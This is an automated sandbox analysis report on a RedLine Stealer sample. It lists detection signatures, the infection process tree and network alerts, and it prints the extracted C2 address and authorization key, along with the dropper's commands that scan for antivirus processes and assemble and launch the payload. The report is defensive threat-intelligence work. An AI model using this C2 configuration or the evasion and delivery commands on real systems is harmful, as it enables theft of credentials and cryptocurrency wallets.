
Windows Analysis Report
be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe

Overview

General Information

Sample name: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
Analysis ID: 1483221
MD5: 37bdc150af529c0f560f1269dee8fa17
SHA1: d5c9e4dd36a99407c0824478c00d0f97fb26ab2f
SHA256: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb31c0e34c7835baa828af
Tags: exe, RedLineStealer

Detection

RedLine
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected RedLine Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Copy From or To System Directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe" MD5: 37BDC150AF529C0F560F1269DEE8FA17)
    • be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp (PID: 6640 cmdline: "C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp" /SL5="$10422,3479677,781312,C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe" MD5: 6CE04FD06C6A2CADE4A53F1521743144)
      • Setup.exe (PID: 6816 cmdline: "C:\Program Files (x86)\StrLocalGate\Setup.exe" MD5: 1C83CFBC97F7BC13E849E9E1AF8E7DA7)
        • Setup.tmp (PID: 7004 cmdline: "C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp" /SL5="$20426,920064,920064,C:\Program Files (x86)\StrLocalGate\Setup.exe" MD5: 85FE6257CAB9D61BA8C481C64D0026BD)
      • MmReveals.exe (PID: 6884 cmdline: "C:\StrLocalGate\MmReveals.exe" MD5: 5223A85FF161E8818F0E514048051E7D)
        • cmd.exe (PID: 7076 cmdline: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 5928 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5676 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 1804 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6304 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 1900 cmdline: cmd /c md 154571 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 3568 cmdline: findstr /V "TRUEANALOGMINDOC" Pepper MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 7132 cmdline: cmd /c copy /b Lt + Blake + Tranny + Category 154571\i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Eco.pif (PID: 2004 cmdline: 154571\Eco.pif 154571\i MD5: B06E67F9767E5023892D9698703AD098)
            • RegAsm.exe (PID: 4476 cmdline: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
            • RegAsm.exe (PID: 4856 cmdline: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • timeout.exe (PID: 6836 cmdline: timeout 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["45.140.147.183:12245"], "Bot Id": "YT2", "Authorization Header": "1a1f648c602cc3ac1cfdc397a97b9b88"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security | -
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -
0000000E.00000003.2257485805.0000000004EC8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -
0000000E.00000003.2257260838.00000000048DC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -
0000000E.00000003.2315350794.0000000004823000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -
0000000E.00000003.2317192962.000000000497F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -
00000014.00000002.2565104285.0000000000702000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -
14.3.Eco.pif.486a450.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -
20.2.RegAsm.exe.700000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | -

System Summary

Source: Process started | Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ParentCommandLine: 154571\Eco.pif 154571\i, ParentImage: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, ParentProcessId: 2004, ParentProcessName: Eco.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ProcessId: 4476, ProcessName: RegAsm.exe
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: 154571\Eco.pif 154571\i, CommandLine: 154571\Eco.pif 154571\i, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7076, ParentProcessName: cmd.exe, ProcessCommandLine: 154571\Eco.pif 154571\i, ProcessId: 2004, ProcessName: Eco.pif
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ParentCommandLine: 154571\Eco.pif 154571\i, ParentImage: C:\Users\user\AppData\Local\Temp\154571\Eco.pif, ParentProcessId: 2004, ParentProcessName: Eco.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\154571\RegAsm.exe, ProcessId: 4476, ProcessName: RegAsm.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\StrLocalGate\MmReveals.exe", ParentImage: C:\StrLocalGate\MmReveals.exe, ParentProcessId: 6884, ParentProcessName: MmReveals.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, ProcessId: 7076, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Humor Humor.cmd & Humor.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7076, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 6304, ProcessName: findstr.exe
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-26T21:22:07.690591+0200 | 2046045 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:17.446338+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:18.812780+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:21:18.052724+0200 | 2022930 | 443 | 49730 | TCP | A Network Trojan was detected
2024-07-26T21:22:19.403291+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:15.262237+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:16.623754+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:07.864694+0200 | 2043234 | 12245 | 49737 | TCP | A Network Trojan was detected
2024-07-26T21:22:12.955942+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:15.075974+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:14.589006+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:18.170910+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:18.991924+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:21:56.944528+0200 | 2022930 | 443 | 49736 | TCP | A Network Trojan was detected
2024-07-26T21:22:14.582562+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:17.937770+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:18.347768+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:15.615103+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:16.262656+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:13.136410+0200 | 2046056 | 12245 | 49737 | TCP | A Network Trojan was detected
2024-07-26T21:22:14.307981+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:16.629545+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:19.621416+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:13.968079+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:13.409040+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:18.635280+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:19.165956+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:16.561838+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:15.440615+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:13.666343+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected
2024-07-26T21:22:17.624813+0200 | 2043231 | 49737 | 12245 | TCP | A Network Trojan was detected


AV Detection

Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Avira: detected
Source: 20.2.RegAsm.exe.700000.0.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["45.140.147.183:12245"], "Bot Id": "YT2", "Authorization Header": "1a1f648c602cc3ac1cfdc397a97b9b88"}
Source: C:\StrLocalGate\MmReveals.exe (copy) | ReversingLabs: Detection: 39%
Source: C:\StrLocalGate\is-RISCU.tmp | ReversingLabs: Detection: 39%
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdb | source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
Source: Binary string: RegAsm.pdb4 | source: RegAsm.exe, 00000013.00000000.2257986725.0000000000042000.00000002.00000001.01000000.0000000D.sdmp, RegAsm.exe.14.dr
Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
Source: C:\StrLocalGate\MmReveals.exe | Code function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_005747B7 GetFileAttributesW,FindFirstFileW,FindClose,14_2_005747B7
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00573B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573B4F
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_00573E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00573E72
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057C16C
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057CB81 FindFirstFileW,FindClose,14_2_0057CB81
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,14_2_0057CC0C
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F445
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,14_2_0057F5A2
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0057F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,14_2_0057F8A3

Networking

Source: Malware configuration extractor | URLs: 45.140.147.183:12245
Source: global traffic | TCP traffic: 192.168.2.4:49737 -> 45.140.147.183:12245
Source: Joe Sandbox View | ASN Name: SYNLINQsynlinqdeDE SYNLINQsynlinqdeDE
Source: unknown | DNS traffic detected: query: WTYoyXMgGLmyIq.WTYoyXMgGLmyIq replycode: Name error (3)
Source: unknown | TCP traffic detected without corresponding DNS query: 45.140.147.183
Source: C:\Users\user\AppData\Local\Temp\154571\Eco.pif | Code function: 14_2_0058279E InternetReadFile,InternetQueryDataAvailable,InternetReadFile,14_2_0058279E
Source: global traffic | DNS traffic detected: DNS query: WTYoyXMgGLmyIq.WTYoyXMgGLmyIq
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.dr | String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.dr | String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: is-RISCU.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: MmReveals.exe, 00000003.00000000.1652016339.0000000000408000.00000002.00000001.01000000.00000008.sdmp, MmReveals.exe, 00000003.00000002.1749854145.0000000000408000.00000002.00000001.01000000.00000008.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp, 00000001.00000002.1662881155.000000000018C000.00000004.00000010.00020000.00000000.sdmp, is-RISCU.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: MmReveals.exe, 00000003.00000003.1677519643.0000000002898000.00000004.00000020.00020000.00000000.sdmp, Miniature.3.dr, Eco.pif.5.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                    Source: RegAsm.exe, 00000014.00000002.2568169273.00000000027B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
